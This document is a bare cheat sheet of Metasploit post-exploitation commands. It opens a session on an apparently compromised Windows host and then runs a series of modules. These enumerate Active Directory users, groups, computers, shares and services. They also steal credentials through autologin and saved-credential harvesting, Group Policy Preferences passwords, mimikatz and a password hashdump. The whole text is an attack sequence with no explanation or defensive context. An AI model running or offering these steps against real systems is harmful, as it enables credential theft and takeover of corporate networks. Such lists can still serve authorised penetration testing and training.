sessions -i SESSION
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_ad_users
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/enum_saved_creds
run post/windows/gather/credentials/gpp
run post/windows/gather/credentials/mimikatz
run post/windows/gather/hashdump
run post/windows/gather/enum_domain
run post/windows/gather/enum_shares
run post/windows/gather/enum_services
run post/windows/gather/checkvm